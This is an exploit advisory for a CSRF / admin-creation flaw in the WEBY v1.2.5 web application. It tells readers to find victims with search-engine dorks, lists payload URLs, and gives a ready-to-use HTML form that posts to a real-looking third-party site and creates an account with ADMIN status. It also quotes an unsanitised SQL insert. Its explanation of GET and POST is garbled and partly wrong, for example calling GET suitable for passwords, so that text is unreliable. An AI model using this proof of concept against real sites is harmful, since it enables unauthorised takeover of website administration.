======================================== ====================================================================================================================================
| # Title : WEBY v.1.2.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(32-bit) |
| # Vendor : https://ทําเว็บหาดใหญ่.com |
| # Dork : |
====================================================================================================================================

poc :

The infected file is the /user.php

Inside the folder /admin/user/

Line 46 we note that it used the variable (_GET $).

When using method="get" in HTML forms, all names and values within the <input> tag will appear on the browser's URL.

Remark :

Use this method when sending important data such as a password or other sensitive information.
A bookmark can be used to mark the page, which can be useful in some cases.
The method you get is suitable when sending large amounts of data.

There are two properties that the <form> element must have for it to function:

- action property: Contains the link to the page you will go to when you click the submit button.
- method: Defines how to send the data entered in the form, and it has two methods, GET and POST.

This data is usually sent to the host (Server) where it is stored.
This data is processed using programming languages that run on the host such as PHP
So the form consists of a set of fields that work together to accomplish a specific function.
For example, the login form on almost all sites consists of three fields:
Name or email field. <“input type="text> or <"input type="email>".
The password input field <“input type=”password> .
Submit button <“input value="submit" type="submit>.

The three fields must be present within one form <“form action="/?Action=add” method=”POST> and so you can build any other form.

We go to line 95

<form action="?Action=add" role="form" method="post" enctype='multipart/form-data'>

property method specifies how the data entered in the form is sent, the HTTP method used to send the data (GET or POST) .
property action specifies the action that will occur when the user clicks the submit button.

The action that takes place is to send the data entered in the form to the same file on the host (Server),

Line 80 uses the $strSQL variable to query the database.

$strSQL .="('".$_POST["user"]."','".$_POST["pass"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["address"]."','".$_FILES["filUpload"]["name"]."') ";


[+] Dorking Ä°n Google Or Other Search Enggine.

[+] Use Payload : /admin/user/user.php?Action=plus <=== add new admin

[+] Use Payload : /admin/user/user.php?Action=show <=== show new admin

[+] http://127.0.0.1/WEBY/admin/user/user.php?Action=plus

[+] Copy the code below and paste it into an HTML file.

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="http://haji-zowzow.com/admin/menu/main.css" />
<title>Setting User</title>
</head>

<link rel="import" href="http://haji-zowzow.com/include/core-icon.html" />
<link rel="import" href="http://haji-zowzow.com/include/paper-ripple.html" />
<script src="http://haji-zowzow.com/js/txt.js"></script>
<!-- ลบ ถามก่อน -->
<script type="text/javascript">
function chkdel(){
if(confirm(' ยืนยันการลบ ใช่ หรือ ไม่? !!! ')){
return true; // ถ้าตกลง OK โปรแกรมก็จะทำงานต่อไป
}else{
return false; // ถ้าตอบ Cancel ก็คือไม่ต้องทำอะไร
}
}
</script>
<!-- จบ -->
<link rel="stylesheet" href="http://haji-zowzow.com/admin/color_plugin/css/colorpicker.css" type="text/css" />
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/jquery.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/colorpicker.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/eye.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/layout.js?ver=1.0.2"></script>

<script src="http://haji-zowzow.com/admin/menu/js/jquery-latest.min.js" type="text/javascript"></script>
<body>
<div class="sub_head">+++ จัดการ User</div><br />
<a href="?Action=plus">
<div class="fab red">
<core-icon icon="add"></core-icon>
<paper-ripple class="circle recenteringTouch" fit></paper-ripple>
</div>
</a>
<a href="http://haji-zowzow.com/admin/user/user.php?Action=show">
<div class="fab blue">
<core-icon icon="menu"></core-icon>
<paper-ripple class="circle recenteringTouch" fit></paper-ripple>
</div>
</a> <br />


<div class="dialog" style="width:600px; height:auto;">
<form action="http://haji-zowzow.com/admin/user/user.php?Action=add" role="form" method="post" enctype='multipart/form-data'>

<div class="form-group">
<input type="text" class="form-control" id="exampleInputEmail1" name="user" required>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Username (รหัสผู้ใช้)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" id="exampleInputEmail1" name="pass" required>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Password (รหัสผ่าน)</label>
</div>



<div class="form-group">
<input type="text" class="form-control" name="name">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Name (ชื่อ-สกุล)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" name="tel">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Telephone (เบอร์โทรศัพท์)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" name="email">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*E-mail (อีเมล์)</label>
</div>

<div class="form-group">
<textarea name="address" style="height:100px; padding:5px;" class="form-control"></textarea>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Address (ที่อยู่)</label>
</div>

<div class="form-group">
<input class="form-control" type="file" id="exampleInputFile" name="filUpload" style="visibility:hidden;">
<label for="exampleInputFile" class="button_m raised blue" style="font-size:20px; padding-left:10px; width:300px; ">Image Profile (เลือกรูปโปรไฟล์ ขนาด 200x200)</label>
</div>

<div class="zero-clipboard"><span class="btn-clipboard with-example" style="font-size:18px; color:#09F;">Status (สถานะ)</span></div><div class="bs-example">

<select class="form-control" name="Status">
<option value="USER">USER</option>
<option value="ADMIN">ADMIN</option>
</select>

</div>

<input type="submit" value="บันทึก" class="button_m raised green" style="border:none; font-family:Conv_thaisanslite_r1;"/>

</form>

</body>
</html>

[+] Go to the line 46.

[+] Set the target site link Save changes and apply .

Greetings to :===================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|
==================================================================================================